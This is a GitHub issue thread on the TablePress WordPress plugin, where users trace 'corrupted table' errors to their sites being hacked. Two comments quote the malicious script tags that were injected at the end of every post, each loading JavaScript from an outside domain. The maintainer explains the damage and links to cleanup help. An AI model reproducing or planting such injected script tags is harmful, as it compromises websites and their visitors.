### ISSUE TITLE
Table corrupt

### ISSUE THREAD

**Issue by davask** [TobiasBg/TablePress#94]
Hi,

I deactivated all my plugins except yours and is still shows table corrupted for any table.
I m using the O2 theme and plugin, WP 4.9.8 with multisite.

How can I fix this ?

**Comment by TobiasBg** [comment]
Hi @davask,

thanks for your post, and sorry for the trouble.

Please follow the instructions from https://tablepress.org/faq/corrupted-tables/ for this.

Best wishes,
Tobias

**Comment by davask** [comment]
I already tried your link for the deactivation of the plugins and it did not work even when all plugins are deactivated

**Comment by davask** [comment]
Now I don t know how to revert the tables and I m wondering if there s a conflict somewhere between version 1.9 of tablePress, WP 4.9.8

**Comment by davask** [comment]
After debuging, I saw this at the end of tablePress post content `<script src='https://db.allyouwant.online/main.js' type='text/javascript'></script>` and it appear in other posts, I believe I ve been act in some ways, since I ve removed that string tablePress works fine

**Comment by TobiasBg** [comment]
Hi,

nice find! This is the cause then. If this was added to the end of every post and page, it was also added to the end of the raw JSON table content (which is stored in the `wp_posts` database table as well).
You will have to remove this code from everywhere in your `wp_posts` database table.

Regards,
Tobias

**Comment by davask** [comment]
Yep, I did it already, thx for the follow up ;)

**Comment by Naren-hybreeder** [comment]
Hi @TobiasBg ,
I just want to know if We import the excel sheet then we are also saving the excelsheet in some folder? if Yes the can you help me with path?

**Comment by TobiasBg** [comment]
Hi @Naren-hybreeder,

no, sorry, TablePress does not save the uploaded files on the server. It directly imports the table, without saving the file.

Regards,
Tobias

**Comment by Naren-hybreeder** [comment]
@TobiasBg ,
ok. Why I am asking this because today, till 11 am my table press, was working perfectly and I was getting the records in front end side. but After 3 pm I check the website and I found This error https://prnt.sc/t9sbi6
`
Attention: The internal data of the table “101” is corrupted!`

I have more than 100 tables on my website and all are getting the same error(except  id number). I try to download but then also I am getting the error Error: The internal data of this table is corrupted!.

any help in this?

**Comment by TobiasBg** [comment]
Hi @Naren-hybreeder,

ah, ok. For help with that, please see https://tablepress.org/faq/corrupted-tables/

Regards,
Tobias

**Comment by Naren-hybreeder** [comment]
@TobiasBg 

Is it possible to hack the table press?
My developer found below code. Once he delete this script then my tables started perfectly.


<script src=‘https://lobbydesires.com/location.js?p=1’ type=text/javascript></script>

**Comment by TobiasBg** [comment]
hi @Naren-hybreeder,

this code definitely comes from a hack, but it's not TablePress that was hacked, but your site. You will likely find this code at the end of all posts and pages of your site as well.
For more help, please also check https://wordpress.org/support/article/faq-my-site-was-hacked/.

Regards,
Tobias

**Comment by Naren-hybreeder** [comment]
Hi @TobiasBg,
Yes, My developer found this code at the end of the post. He removed this code started working. I am checking how can I secure my website.
